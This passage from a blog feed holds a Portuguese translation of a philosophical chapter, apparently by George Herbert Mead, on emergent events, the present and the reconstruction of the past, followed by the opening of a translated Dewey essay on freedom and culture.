<p>O que aparece nessa crítica é que, embora o cientista jamais abandone o condicionamento daquilo que ocorre por aquilo que aconteceu anteriormente, expresso em termos de probabilidade, ele se vê perfeitamente capaz de pensar como emergentes até mesmo aqueles eventos que estão sujeitos à determinação mais exata. Não estou tentando prever qual interpretação futura será dada às especulações de de Broglie, Schröder e Planck. Estou apenas indicando que, mesmo no campo da física matemática, o pensamento rigoroso não implica necessariamente que o condicionamento do presente pelo passado traga consigo a determinação completa do presente pelo passado.</p>

<p>Terceiro, na passagem, o condicionamento daquilo que está ocorrendo por aquilo que ocorreu, do presente pelo passado, está presente. O passado, nesse sentido, está no presente; e, naquilo que chamamos de experiência consciente, sua presença manifesta-se na memória e no aparato histórico que amplia a memória, como aquela parte da natureza condicionante da passagem que se reflete na experiência do indivíduo orgânico.</p>

<p>Se todos os objetos em um presente são condicionados pelos mesmos caracteres na passagem, seus passados são implicitamente os mesmos; mas se, para seguir uma sugestão tomada das especulações acerca dos quanta, um elétron dentre dois mil libera energia quando não há condições determinantes para a seleção desse elétron em vez dos outros mil novecentos e noventa e nove, é evidente que o passado tal como se manifesta na conduta desse elétron será de um tipo que nem sequer implicitamente será o mesmo que o dos outros naquele grupo, embora seu salto seja condicionado por tudo o que ocorreu antes.</p>

<p>Se, entre dois mil indivíduos sob condições sociais desagregadoras, um comete suicídio quando, tanto quanto se pode ver, um era tão propenso quanto outro a sucumbir, seu passado possui uma natureza particularmente pungente que está ausente do passado dos demais, embora seu suicídio seja uma expressão do passado. O passado está ali condicionando o presente e sua passagem para o futuro, mas, na organização de tendências incorporadas em um indivíduo, pode haver um emergente que confere a essas tendências uma estrutura que pertence apenas à situação desse indivíduo.</p>

<p>As tendências provenientes da passagem passada e do condicionamento inerente à passagem tornam-se influências diferentes quando assumem essa estrutura organizada de tendências. Isso seria tão verdadeiro para o equilíbrio entre processos de desagregação e aglomeração em uma estrela quanto para o ajustamento recíproco entre uma forma viva e seu ambiente. A relação estrutural em seu equilíbrio ou ajustamento recíproco organiza aqueles processos em passagem que se refletem retrospectivamente e nos conduzem a uma descrição da história da estrela.</p>

<p>Como Dewey sustentou, os eventos aparecem como histórias que possuem um desfecho, e, quando um processo histórico está ocorrendo, a organização das fases condicionantes do processo é o elemento novo que não é previsível a partir das fases separadas em si mesmas, e que imediatamente estabelece o cenário para um passado que conduz a esse resultado. A organização de qualquer coisa individual traz consigo a relação dessa coisa com processos que ocorreram antes que essa organização se estabelecesse. Nesse sentido, o passado dessa coisa é “dado” no presente em passagem da própria coisa, e nossas histórias das coisas são elaborações daquilo que está implícito nessa situação. Esse “dado” na passagem está ali e constitui o ponto de partida para uma estrutura cognitiva de um passado.</p>

<p>Quarto, esse caráter emergente, sendo responsável por uma relação entre processos em passagem, estabelece um passado dado que é, por assim dizer, uma perspectiva do objeto dentro da qual esse caráter aparece. Podemos conceber um objeto como, digamos, algum átomo de hidrogênio que permaneceu o que é através de períodos incomensuráveis em completo ajustamento ao seu entorno, que permaneceu real no deslizar de um presente para outro, ou melhor, em uma passagem contínua, ininterrupta e sem acontecimentos. Para tal objeto haveria existência ininterrupta, mas não passado, a menos que retornássemos à ocasião em que emergiu como átomo de hidrogênio.</p>

<p>Isso equivale a dizer que, onde o ser é existência mas não devir, não há passado, e que a determinação envolvida na passagem é uma condição do passado, mas não sua realização. A relação de passagem envolve naturezas distinguíveis nos eventos antes que passado, presente e futuro possam surgir, assim como a extensão é uma relação que envolve coisas físicas distinguíveis antes que um espaço estruturável possa surgir. O que torna um evento distinguível de outro é um devir que afeta a natureza interna do evento.</p>

<p>Parece-me que a extrema matematização da ciência recente, na qual a realidade do movimento é reduzida a equações em que a mudança desaparece numa identidade, e na qual espaço e tempo desaparecem em um contínuo quadridimensional de eventos indistinguíveis que não é nem espaço nem tempo, é um reflexo do tratamento do tempo como passagem sem devir.</p>

<p>O que é então um presente? A definição de Whitehead nos remeteria à extensão temporal da passagem dos eventos que compõem uma coisa, uma extensão suficientemente ampla para tornar possível que a coisa seja aquilo que é. A de um átomo de ferro não precisaria ser mais longa do que o período dentro do qual a revolução de cada um de seus elétrons em torno do núcleo se completa. O universo durante esse período constituiria uma duração do ponto de vista do átomo. O presente especioso de um indivíduo humano seria presumivelmente um período dentro do qual ele pudesse ser ele mesmo.</p>

<p>Do ponto de vista que sugeri, ele envolveria um devir. Deve haver ao menos algo que aconteça à coisa e nela, algo que afete sua natureza, para que um momento possa ser distinguido de outro, para que possa haver tempo. Mas há, em tal afirmação, um conflito entre princípios de definição. De um ponto de vista, estamos buscando aquilo que é essencial a um presente; de outro, estamos buscando o limite inferior em um processo de divisão.</p>

<p>Referir-me-ei primeiro a este último, pois ele envolve a questão da relação do tempo com a passagem — com aquilo dentro do qual o tempo parece situar-se e em termos de cuja extensão colocamos o tempo e comparamos tempos. A milésima parte de um segundo possui um significado real, e podemos conceber o universo afundando em um mar de entropia dentro do qual todo devir tenha cessado.</p>

<p>Estamos lidando aqui com uma abstração da extensão da mera passagem em relação ao tempo dentro do qual os eventos acontecem porque se tornam. No tratamento de Whitehead, isso é chamado de “abstração extensiva” e conduz a uma partícula-evento assim como a análise matemática conduz ao diferencial. E uma partícula-evento deveria ter a mesma relação com algo que se torna que o diferencial de uma mudança, tal como uma velocidade acelerada, tem com o processo inteiro.</p>

<p>Nessa medida, a abstração extensiva é um método de análise e integração e não requer outra justificação além de seu sucesso. Mas Whitehead a utiliza como método de abstração metafísica e encontra, no mero acontecer, o evento, a substância daquilo que se torna. Ele transfere o conteúdo daquilo que se torna para um mundo de “objetos eternos” que ingressam nos eventos sob o controle de um princípio situado fora de sua ocorrência.</p>

<p>Assim, embora a existência daquilo que ocorre seja encontrada no presente, o “o que é” daquilo que ocorre não surge do acontecer; ele acontece ao evento por meio do processo metafísico da ingressão. Isso me parece um uso impróprio da abstração, pois conduz a uma separação metafísica daquilo que foi abstraído em relação à realidade concreta da qual a abstração foi feita, em vez de deixá-lo como um instrumento no controle intelectual dessa realidade.</p>

<p>Bergson refere-se, penso eu, ao mesmo uso impróprio da abstração, em outro contexto, como a espacialização do tempo, contrastando a natureza exclusiva de tais momentos temporais com a interpenetração dos conteúdos da “duração” real.</p>

<p>Se, ao contrário, reconhecermos aquilo que se torna como o evento que, em sua relação com outros eventos, dá estrutura ao tempo, então a abstração da passagem em relação àquilo que está ocorrendo é puramente metodológica. Levamos nossa análise tão longe quanto o controle do objeto exige, mas sempre reconhecendo que aquilo que é abstraído possui sua realidade na integração daquilo que está ocorrendo.</p>

<p>Que esse é o resultado de definir o evento como aquilo que se torna é evidente, penso eu, na aplicação e no teste de nossas hipóteses mais abstrusas. Para terem valor e serem acreditadas, elas devem apresentar novos eventos surgindo de antigos, como a expansão ou contração do universo nas especulações de Einstein e Weyl acerca das aparentes recessões em velocidades enormes de nebulosas distantes, ou o arrancamento de elétrons dos núcleos atômicos no centro dos corpos estelares nas especulações de Jeans sobre a transformação da matéria em radiação.</p>

<p>E esses acontecimentos devem ajustar-se de tal modo às nossas descobertas experimentais que possam encontrar sua realidade na concreção daquilo que está ocorrendo em um presente efetivo. Os passados que eles estendem atrás de nós são tão hipotéticos quanto o futuro que nos ajudam a prever. Tornam-se válidos na interpretação da natureza na medida em que apresentam uma história de devires na natureza conduzindo àquilo que está se tornando hoje, na medida em que revelam aquilo que se ajusta ao padrão que emerge do estrondoso tear do tempo, e não na medida em que erigem entidades metafísicas que são o tênue reverso de um aparato matemático.</p>

<p>Se, na expressão de Bergson, a “duração real” torna-se tempo por meio do aparecimento de eventos únicos, distinguíveis entre si por sua natureza qualitativa — algo que é emergente em cada evento —, então a mera passagem é um modo de ordenar esses eventos. Mas o que é essencial a essa ordenação é que, em cada intervalo isolado, deve ser possível que algo se torne, que algo único surja. Estamos sujeitos a uma ilusão psicológica se supomos que o ritmo da contagem e a ordem que surge da contagem correspondem a uma estrutura da própria passagem, separada dos processos que entram em ordem por meio da emergência dos eventos.</p>

<p>Jamais alcançamos o próprio intervalo entre eventos, exceto em correlações entre eles e outras situações dentro das quais encontramos congruência e substituição, algo que nunca pode ocorrer na passagem enquanto tal. Alcançamos aquilo que pode ser chamado de igualdade funcional de intervalos representados dentro de processos que envolvem equilíbrio e ritmo, mas, com base nisso, estabelecer o tempo como uma quantidade dotada de uma natureza essencial que permite sua divisão em porções iguais de si mesmo constitui um uso injustificado da abstração.</p>

<p>Podemos reconstruir hipoteticamente os processos passados implicados naquilo que está ocorrendo como base para a construção cognitiva do futuro que está surgindo. Aquilo de que os dados experimentais nos asseguram é que compreendemos suficientemente o que está ocorrendo para prever o que terá lugar, não que tenhamos alcançado uma imagem correta do passado independente de qualquer presente, pois esperamos que essa imagem se altere à medida que novos eventos emergem.</p>

<p>Nessa atitude, estamos relacionando em nossa antecipação presentes que deslizam uns nos outros, e seus passados pertencem a eles. Eles precisam ser reconstruídos à medida que são incorporados em um novo presente e, como tais, pertencem a esse presente, e não mais ao presente do qual passamos para o presente atual.</p>

<p>Um presente, então, em contraste com a abstração da mera passagem, não é um pedaço recortado arbitrariamente da dimensão temporal de uma realidade uniformemente fluente. Sua principal referência é ao evento emergente, isto é, à ocorrência de algo que é mais do que os processos que conduziram até ele e que, por sua mudança, continuidade ou desaparecimento, acrescenta às passagens posteriores um conteúdo que elas de outro modo não possuiriam. A marca da passagem sem eventos emergentes é sua formulação em equações nas quais os chamados instantes desaparecem numa identidade, como apontou Meyerson.</p>

<p>Dado um evento emergente, suas relações com processos antecedentes tornam-se condições ou causas. Tal situação é um presente. Ela delimita e, em certo sentido, seleciona aquilo que tornou possível sua peculiaridade. Cria, com sua singularidade, um passado e um futuro. Tão logo a consideramos, ela se torna uma história e uma profecia. Seu próprio diâmetro temporal varia conforme a extensão do evento.</p>

<p>Pode haver uma história do universo físico como aparecimento de uma galáxia de galáxias. Há uma história de todo objeto que é único. Mas não haveria tal história do universo físico até que a galáxia aparecesse, e ela continuaria apenas enquanto a galáxia se mantivesse contra forças disruptivas e coesivas. Se perguntarmos qual pode ser a extensão temporal da singularidade responsável por um presente, a resposta deve ser, nos termos de Whitehead, que ela é um período suficientemente longo para permitir que o objeto seja aquilo que é.</p>

<p>Mas a questão é ambígua, pois o termo “extensão temporal” implica uma medida do tempo. O passado, tal como aparece com o presente e o futuro, é a relação do evento emergente com a situação da qual surgiu, e é o evento que define essa situação. A continuidade ou desaparecimento daquilo que surge é o presente passando para o futuro. Passado, presente e futuro pertencem a uma passagem que adquire estrutura temporal por meio do evento, e podem ser considerados longos ou curtos conforme sejam comparados com outras passagens desse tipo.</p>

<p>Mas, enquanto existentes na natureza — na medida em que tal afirmação tenha significado —, o passado e o futuro são os limites daquilo que denominamos presente e são determinados pelas relações condicionantes do evento com sua situação.</p>

<p>Os passados e futuros aos quais nos referimos estendem-se para além dessas relações contíguas na passagem. Nós os prolongamos na memória e na história, na antecipação e na previsão. Eles são eminentemente o campo da ideação e encontram seu locus naquilo que se chama mente. Embora estejam no presente, referem-se àquilo que não está nesse presente, como é indicado por sua relação com passado e futuro. Referem-se para além de si mesmos, e dessa referência surge sua natureza representacional.</p>

<p>Eles pertencem evidentemente a organismos, isto é, a eventos emergentes cuja natureza envolve a tendência de manter-se. Em outras palavras, sua situação envolve ajustamento voltado para um passado e sensibilidade seletiva voltada para um futuro. Aquilo que pode ser chamado de matéria da qual surgem as ideias são as atitudes desses organismos: hábitos, quando olhamos para o passado, e ajustamentos iniciais dentro do ato às consequências de suas respostas, quando olhamos para o futuro. Até aqui, esses elementos pertencem ao que pode ser chamado de passado e futuro imediatos.</p>

<p>Essa relação do evento com sua situação, do organismo com seu ambiente, juntamente com sua dependência mútua, conduz-nos à relatividade e às perspectivas nas quais ela aparece na experiência. A natureza do ambiente corresponde aos hábitos e atitudes seletivas dos organismos, e as qualidades pertencentes aos objetos do ambiente só podem ser expressas em termos das sensibilidades desses organismos. O mesmo é verdadeiro para as ideias.</p>

<p>O organismo, por meio de seus hábitos e atitudes antecipatórias, encontra-se relacionado àquilo que se estende para além de seu presente imediato. Aqueles caracteres das coisas que, na atividade do organismo, se referem ao que está além do presente assumem o valor daquilo a que se referem. O campo da mente, então, é o ambiente mais amplo requerido pela atividade do organismo, mas que transcende o presente.</p>

<p>O que está presente no organismo, contudo, é sua própria atividade nascente, e aquilo nele mesmo e no ambiente que a sustenta; e está presente também seu movimento vindo do passado e indo além do presente. Pertence ao chamado organismo consciente completar esse ambiente temporal mais amplo pelo uso de caracteres encontrados no presente. O mecanismo pelo qual a mente social realiza isso discutirei mais tarde; o que desejo destacar agora é que o campo da mente é a extensão temporal do ambiente do organismo, e que uma ideia reside no organismo porque o organismo utiliza aquilo em si mesmo que se move para além de seu presente para ocupar o lugar daquilo em direção ao qual sua própria atividade tende.</p>

<p>Aquilo no organismo que fornece a ocasião para a mente é a atividade que alcança para além do presente dentro do qual o organismo existe.</p>

<p>Mas, em uma descrição como esta, estive implicitamente estabelecendo esse período mais amplo dentro do qual, digamos, um organismo inicia e completa sua história como estando ali aparentemente em independência de qualquer presente; e meu propósito é insistir na proposição oposta, a saber, que esses períodos mais amplos não podem ter realidade exceto na medida em que existam em presentes, e que todas as suas implicações e valores estão aí localizados.</p>

<p>Isso nos remete, primeiro, ao fato evidente de que todo o aparato do passado — imagens da memória, monumentos históricos, restos fósseis e semelhantes — está em algum presente; e, segundo, àquela porção do passado que está ali na passagem da experiência, conforme determinada pelo evento emergente. Remete-nos, terceiro, ao teste necessário da formulação do passado nos eventos que surgem na experiência. O passado de que falamos situa-se, com todos os seus caracteres, dentro desse presente.</p>

<p>Há, entretanto, a implicação assumida de que esse presente se refere a entidades que possuem uma realidade independente deste e de qualquer outro presente, cujos detalhes completos, embora evidentemente além de qualquer recuperação, são inevitavelmente pressupostos. Ora, há uma confusão entre tal suposição metafísica e o fato evidente de que somos incapazes de revelar tudo o que está implicado em qualquer presente.</p>

<p>Aqui estamos com Newton diante de um mar sem limites, recolhendo apenas os seixos de sua praia. Não há nada de transcendente nessa impotência de nossas mentes para esgotar qualquer situação. Todo avanço rumo a um conhecimento maior simplesmente amplia o horizonte da experiência, mas tudo permanece dentro da experiência concebível.</p>

<p>Uma mente maior do que a de Newton ou Einstein revelaria na experiência, no mundo que está aí, estruturas e processos que não conseguimos encontrar nem sequer esboçar. Ou tomemos a concepção de Bergson segundo a qual todas as nossas memórias, ou todas as ocorrências sob a forma de imagens, acorrem sobre nós e são contidas por um sistema nervoso central. Tudo isso é concebível em um presente cuja riqueza integral estivesse à disposição desse próprio presente.</p>

<p>Isso não significa que os éons revelados nessas estruturas e processos, ou as histórias que essas imagens conotam, desenrolar-se-iam em um presente temporalmente tão extenso quanto sua formulação implica. Significa, na medida em que tal concepção ou imaginação desenfreada possa ter sentido, que teríamos uma riqueza inconcebível oferecida à nossa análise na abordagem de qualquer problema surgido na experiência.</p>

<p>O passado na passagem é irrecuperável assim como irrevogável. Ele está produzindo toda a realidade que existe. O significado daquilo que é é iluminado e ampliado diante do emergente na experiência, como (a+b) elevado à vigésima quinta potência pelo teorema binomial, pela expansão da passagem que está ocorrendo.</p>

<p>Dizer que a Declaração de Independência foi assinada em 4 de julho de 1776 significa que, no sistema temporal que carregamos conosco e com a formulação de nossos hábitos políticos, essa data reaparece em nossas celebrações. Sendo aquilo que somos no mundo social e físico que habitamos, damos conta do que ocorre nesse cronograma temporal, mas, como tabelas de horários ferroviários, ele está sempre sujeito a mudanças sem aviso prévio. Cristo nasceu quatro anos antes de d.C.</p>

<p>Nossa referência é sempre à estrutura do presente, e nosso teste da formulação que fazemos é sempre o de realizar com sucesso nossos cálculos e observações em um futuro em ascensão. Se dizemos que algo aconteceu em tal data, quer possamos especificá-la ou não, devemos querer dizer que, se em imaginação nos colocássemos de volta na data suposta, teríamos tido tal experiência; mas não é disso que nos ocupamos quando elaboramos a história do passado. O que requer iluminação e direção é o significado daquilo que está ocorrendo na ação ou na apreciação, devido ao aparecimento constante do novo, de cujo ponto de vista nossa experiência exige uma reconstrução que inclua o passado.</p>

<p>A melhor abordagem desse significado encontra-se no mundo dentro do qual nossos problemas surgem. Suas coisas são coisas duradouras que são aquilo que são devido ao caráter condicionante da passagem. Seu passado está naquilo que elas são. Tal passado não é eventual. Quando elaboramos a história de uma árvore cuja madeira se encontra nas cadeiras em que nos sentamos, desde a diatomácea até o carvalho recentemente abatido, essa história gira em torno da constante reinterpretação de fatos que surgem continuamente; nem esses fatos novos devem ser encontrados simplesmente no impacto de experiências humanas mutáveis sobre um mundo que está aí.</p>

<p>Pois, em primeiro lugar, as experiências humanas fazem tanto parte desse mundo quanto quaisquer de suas outras características, e o mundo é um mundo diferente por causa dessas experiências. E, em segundo lugar, em qualquer história que construamos somos forçados a reconhecer a mudança na relação entre a passagem condicionante e o evento emergente, naquela parte do passado que pertence à passagem, mesmo quando essa passagem não é expandida na ideação.</p>

<p>O resultado do que disse é que a avaliação e o significado de todas as histórias residem na interpretação e no controle do presente; que, enquanto estruturas ideacionais, elas surgem sempre da mudança, que é parte tão essencial da realidade quanto o permanente, e dos problemas que a mudança acarreta; e que a exigência metafísica de um conjunto de eventos que esteja inalteravelmente presente em um passado irrevogável, ao qual essas histórias procuram aproximar-se continuamente, remete a motivos diversos daqueles em operação na pesquisa científica mais exata.</p>

<h3 id="notas-do-capítulo">Notas do Capítulo.</h3>

<blockquote><p>Estas páginas foram encontradas entre os papéis do Sr. Mead após sua morte. Parecem ter sido escritas mais tarde do que o capítulo ao qual estão aqui anexadas, possivelmente como resultado de uma discussão crítica a seu respeito em uma reunião do Philosophy Club da Universidade de Chicago em janeiro de 1931.</p></blockquote>

<p>As durações são um contínuo deslizar de presentes uns nos outros. O presente é uma passagem constituída por processos cujas fases anteriores determinam, em certos aspectos, suas fases posteriores. A realidade, então, está sempre em um presente. Quando o presente passou, ele já não é mais. Surge a questão de saber se o passado que emerge na memória e na projeção desta ainda mais para trás refere-se a eventos que existiram como tais presentes contínuos passando uns nos outros, ou àquela fase condicionante do presente em passagem que nos permite determinar a conduta com referência ao futuro que também está surgindo no presente. É esta última tese que sustento.</p>

<p>A implicação de minha posição é que o passado é uma construção tal que a referência encontrada nele não é a eventos que possuam uma realidade independente do presente, que é a sede da realidade, mas antes a uma interpretação do presente em sua passagem condicionante que permitirá à conduta inteligente prosseguir. É naturalmente evidente que os materiais a partir dos quais esse passado é construído encontram-se no presente. Refiro-me às imagens da memória e às evidências por meio das quais construímos o passado, e ao fato de que qualquer reinterpretação da imagem que formamos do passado será encontrada em um presente e será julgada pelos caracteres lógicos e probatórios que tais dados possuem em um presente.</p>

<p>Também é evidente que não há apelo possível a partir desses elementos em seu locus presente para um passado real que esteja desenrolado atrás de nós como um pergaminho e ao qual possamos recorrer para verificar nossas construções. Não estamos decifrando um manuscrito cujas passagens possam tornar-se inteligíveis em si mesmas e permanecer como apresentações seguras daquela porção do que ocorreu anteriormente, a serem suplementadas por construções finais posteriores de outras passagens.</p>

<p>Não estamos contemplando um passado último e imutável que possa estar estendido atrás de nós em sua totalidade, sem estar sujeito a novas mudanças. Nossas reconstruções do passado variam em sua extensão, mas jamais contemplam a finalidade de seus resultados. Estão sempre sujeitas a reformulações concebíveis, diante da descoberta de novas evidências, e essa reformulação pode ser completa. Mesmo as imagens de memória mais vívidas podem estar erradas.</p>

<p>Em suma, nossas certezas acerca do passado jamais são alcançadas por uma congruência entre o passado construído e um passado real independente dessa construção, embora carreguemos essa atitude no fundo de nossas mentes, porque de fato submetemos nossas reconstruções hipotéticas imediatas ao teste do passado aceito e as julgamos segundo sua concordância com o registro aceito; mas esse passado aceito situa-se em um presente e está ele próprio sujeito a possível reconstrução.</p>

<p>Ora, é possível aceitar tudo isso, admitindo plenamente que nenhum item do passado aceito é definitivo, e ainda assim sustentar que permanece uma referência, em nossa formulação do evento passado, a algo que aconteceu e que jamais poderemos ressuscitar no conteúdo da realidade, algo que pertenceu ao evento no presente dentro do qual ocorreu.</p>

<p>Isso equivale a dizer que existe atrás de nós um pergaminho de presentes transcorridos, ao qual nossas construções do passado se referem, embora sem a possibilidade de jamais alcançá-lo, e sem a expectativa de que nossas contínuas reconstruções se aproximem dele com precisão crescente. E isso me leva ao ponto em questão.</p>

<p>Tal pergaminho, se fosse alcançado, não seria a descrição que nossos passados requerem. Se pudéssemos trazer de volta o presente transcorrido na realidade que lhe pertenceu, ele não nos serviria. Ele seria aquele presente e careceria precisamente daquele caráter que exigimos do passado, isto é, daquela construção da natureza condicionante da passagem agora presente que nos permite interpretar aquilo que está surgindo no futuro pertencente a este presente.</p>

<p>Quando alguém recorda os dias de sua infância, não consegue entrar neles tal como então era, sem sua relação com aquilo em que se tornou; e, se pudesse — isto é, se pudesse reproduzir a experiência tal como então ocorreu —, não poderia utilizá-la, pois isso envolveria não estar no presente dentro do qual esse uso deve ocorrer. Uma sequência de presentes concebivelmente existentes enquanto presentes jamais constituiria um passado.</p>

<p>Se então existe tal referência, ela não é a uma entidade que pudesse ajustar-se a qualquer passado, e não posso acreditar que a referência, no passado tal como experimentado, seja a algo que não possuísse a função ou o valor que em nossa experiência pertencem a um passado. Não estamos nos referindo a um evento passado real que não fosse o evento passado que buscamos.</p>

<p>Outra maneira de dizer isso é que nossos passados são sempre mentais da mesma maneira que os futuros que se encontram diante de nós em nossa imaginação são mentais. Eles diferem, à parte suas posições sucessivas, em que as condições determinantes da interpretação e da conduta estão incorporadas no passado tal como ele é encontrado no presente, mas estão sujeitos ao mesmo teste de validade ao qual nossos futuros hipotéticos estão sujeitos. E a novidade de cada futuro exige um passado novo.</p>

<p>Isso, contudo, deixa de lado um importante caráter de qualquer passado, e este é que nenhum passado que possamos construir pode ser tão adequado quanto a situação exige. Há sempre uma referência a um passado que não pode ser alcançado, e ainda assim consonante com a função e o significado de um passado.</p>

<p>É sempre concebível que as implicações do presente fossem levadas mais longe do que de fato as levamos, e mais longe do que possivelmente podemos levá-las. Há sempre mais conhecimento que seria desejável para a solução de qualquer problema que nos confronta, mas que não podemos alcançar. Com a obtenção concebível desse conhecimento, sem dúvida construiríamos um passado mais verdadeiro em relação ao presente dentro do qual se encontram as implicações desse passado.</p>

<p>E é a esse passado que há sempre uma referência dentro de cada passado que se apresenta imperfeitamente à nossa investigação. Se possuíssemos todo documento possível e todo monumento possível do período de Júlio César, sem dúvida teríamos uma imagem mais verdadeira do homem e do que ocorreu em sua época, mas seria uma verdade pertencente a este presente, e um presente posterior a reconstruiria do ponto de vista de sua própria natureza emergente.</p>

<p>Podemos então conceber um passado que, em qualquer presente determinado, seria irrefutável. Na medida em que esse presente estivesse em questão, ele seria um passado final; e, se considerarmos atentamente o assunto, penso que é a esse passado que se refere aquilo que ultrapassa a formulação que o historiador pode fornecer e que somos propensos a supor ser um passado independente do presente.</p>
]]></content:encoded>
      <author>Nomos</author>
      <guid>https://infosec.press/read/a/dzu862d0z8</guid>
      <pubDate>Thu, 28 May 2026 04:03:27 +0000</pubDate>
    </item>
    <item>
      <title>O problema da liberdade</title>
      <link>https://infosec.press/nomos/o-problema-da-liberdade</link>
      <description>&lt;![CDATA[Por John Dewey em Liberdade e Cultura (EUA, 1939).&#xA;!--more--&#xA;&#xA;O que é liberdade e por que ela é tão valorizada? O desejo de liberdade é inerente à natureza humana ou é produto de circunstâncias especiais? Ela é desejada como um fim em si mesma ou como um meio para se obter outras coisas? Sua posse implica responsabilidades, e essas responsabilidades são tão onerosas que a maioria das pessoas abriria mão da liberdade em prol de maior conforto? A luta pela liberdade é tão árdua que a maioria das pessoas se distrai facilmente do esforço para conquistá-la e mantê-la? A liberdade em si e tudo o que ela proporciona parece tão importante quanto a segurança do sustento; quanto comida, abrigo, vestuário ou mesmo se divertir? O homem já se importou tanto com ela quanto nos ensinaram a acreditar neste país? Há alguma verdade na antiga noção de que a força motriz da história política foi o esforço do homem comum para alcançar a liberdade? Nossa própria luta pela independência política foi, de fato, motivada pelo desejo de liberdade, ou havia uma série de desconfortos dos quais nossos ancestrais queriam se livrar, coisas que não tinham nada em comum além de serem consideradas problemáticas?&#xA;&#xA;Será que o amor à liberdade é algo mais do que um desejo de se libertar de alguma restrição específica? E quando essa restrição é eliminada, o desejo de liberdade se dissipa até que algo mais se torne intolerável? Além disso, como se compara, em intensidade, o desejo de liberdade com o desejo de se sentir igual aos outros, especialmente àqueles que antes eram considerados superiores? Como se comparam os frutos da liberdade com os prazeres que brotam de um sentimento de união, de solidariedade, com os outros? Estarão os homens dispostos a renunciar às suas liberdades se acreditarem que, ao fazê-lo, obterão a satisfação que advém de um sentimento de fusão com os outros e do respeito alheio, produto da força proporcionada pela solidariedade?&#xA;&#xA;O estado atual do mundo coloca questões como essas aos cidadãos de todos os países democráticos. Coloca-as com especial força em nós, em um país onde as instituições democráticas estão intrinsecamente ligadas a uma certa tradição, cuja “ideologia” é a expressão clássica da Declaração de Independência. Essa tradição nos ensinou que a conquista da liberdade é o objetivo da história política; que o autogoverno é o direito inerente dos homens livres e é aquilo que, uma vez alcançado, os homens prezam acima de tudo. Contudo, ao observarmos o mundo, vemos instituições supostamente livres em muitos países não tanto derrubadas, mas abandonadas voluntariamente, aparentemente com entusiasmo. Podemos inferir que o ocorrido é a prova de que elas nunca existiram na realidade, mas apenas de nome. Ou podemos nos consolar com a crença de que circunstâncias incomuns, como a frustração e a humilhação nacional, levaram os homens a acolher qualquer tipo de governo que prometesse restaurar o respeito próprio nacional. Mas as condições em nosso país, assim como o declínio da democracia em outros países, nos obrigam a questionar a trajetória e o destino das sociedades livres, inclusive a nossa.&#xA;&#xA;Talvez tenha havido um tempo em que as perguntas feitas parecessem ser principalmente ou exclusivamente políticas. Agora sabemos mais. Pois sabemos que grande parte das causas que produziram as condições expressas nas perguntas reside na dependência da política em relação a outras forças, notadamente a econômica. O problema da constituição da natureza humana está envolvido, visto que faz parte de nossa tradição que o amor à liberdade é inerente à sua essência. Será a psicologia popular da democracia um mito? A antiga doutrina sobre a natureza humana também estava ligada à crença ética de que a democracia política é um direito moral e que as leis em que se baseia são leis morais fundamentais que toda forma de organização social deve obedecer. Se a crença nos direitos naturais e nas leis naturais como fundamento do governo livre for abandonada, este último terá alguma outra base moral? Embora seja insensato acreditar que as colônias americanas travaram as batalhas que garantiram sua independência e que construíram seu governo consciente e deliberadamente sobre uma base de teorias psicológicas e morais, a tradição democrática, seja ela um sonho ou uma visão perspicaz, estava tão intimamente ligada a crenças sobre a natureza humana e sobre os fins morais que as instituições políticas deveriam servir, que um choque brutal ocorre quando essas relações se rompem. Haverá algo que possa substituí-las, algo que ofereça o tipo de apoio que outrora proporcionavam?&#xA;&#xA;Os problemas subjacentes às perguntas formuladas, as forças que lhes conferem urgência, transcendem as crenças particulares que formaram o alicerce psicológico e moral inicial da democracia. Após se aposentar da vida pública, Thomas Jefferson, em sua velhice, manteve uma amistosa correspondência filosófica com John Adams. Em uma de suas cartas, ele fez uma declaração sobre as condições americanas da época e expressou uma esperança quanto ao futuro do país: “O avanço do liberalismo alimenta a esperança de que a mente humana um dia retorne à liberdade que desfrutava há dois mil anos. Este país, que deu ao mundo o exemplo da liberdade física, deve-lhe também o da emancipação moral, pois, até o momento, ela ainda é apenas nominal entre nós. A inquisição da opinião pública, na prática, supera a liberdade teoricamente afirmada pelas leis.” A situação que se desenvolveu desde então pode muito bem nos levar a inverter as ideias que ele expressou e a questionar se a liberdade política pode ser mantida sem a liberdade cultural que ele esperava ser o resultado final da liberdade política. Já não é fácil alimentar a esperança de que, dada a liberdade política como a única coisa necessária, todas as outras coisas lhe serão acrescentadas com o tempo — e, consequentemente, a nós. Pois agora sabemos que as relações que existem entre as pessoas, fora das instituições políticas — relações de indústria, de comunicação, de ciência, de arte e de religião — afetam as associações diárias e, por conseguinte, influenciam profundamente as atitudes e os hábitos expressos no governo e nas normas jurídicas. Se é verdade que o político e o jurídico reagem para moldar as outras coisas, é ainda mais verdade que as instituições políticas são um efeito, e não uma causa.&#xA;&#xA;É esse conhecimento que define o tema a ser discutido. Pois esse complexo de condições que rege os termos em que os seres humanos se associam e vivem juntos se resume na palavra Cultura. O problema é saber que tipo de cultura é tão livre em si mesma que concebe e gera a liberdade política como seu acompanhamento e consequência. O que dizer do estado da ciência e do conhecimento; das artes, belas artes e tecnologia; das amizades e da vida familiar; dos negócios e das finanças; das atitudes e disposições criadas na troca das relações cotidianas? Independentemente da constituição inata da natureza humana, suas atividades laborais, aquelas que respondem a instituições e regras e que, em última análise, moldam o padrão destas, são criadas por todo o conjunto de ocupações, interesses, habilidades e crenças que constituem uma determinada cultura. À medida que esta se transforma, especialmente à medida que se torna complexa e intrincada, como ocorreu com a vida americana desde a formação de nossa organização política, novos problemas substituem aqueles que governavam a formação e a distribuição anteriores dos poderes políticos. A ideia de que o amor à liberdade é tão inerente ao homem que, se lhe for dada a oportunidade pela abolição das opressões exercidas pela Igreja e pelo Estado, produzirá e manterá instituições livres já não se sustenta. Essa ideia surgiu naturalmente quando os colonizadores de um novo país sentiram que a distância que haviam criado entre si e as forças que os oprimiam simbolizava, na prática, tudo o que se interpunha entre eles e a conquista permanente da liberdade. Agora, somos obrigados a reconhecer que são necessárias condições positivas, que constituam o estado atual da cultura. A libertação das opressões e repressões que existiam anteriormente representou uma transição necessária, mas as transições são apenas pontes para algo diferente.&#xA;&#xA;Os primeiros republicanos foram obrigados, ainda em sua época, a observar que as condições gerais, como as resumidas sob o nome de cultura, tinham muito a ver com as instituições políticas. Pois eles sustentavam que as opressões do Estado e da Igreja exerciam uma influência corruptora sobre a natureza humana, de modo que o impulso original para a liberdade havia se perdido ou se deformado. Isso era praticamente uma admissão de que as circunstâncias externas podiam ser mais fortes do que as tendências inatas. Demonstrava um grau de plasticidade na natureza humana que exigia o exercício de uma solicitude contínua — expressa no ditado de que a vigilância eterna é o 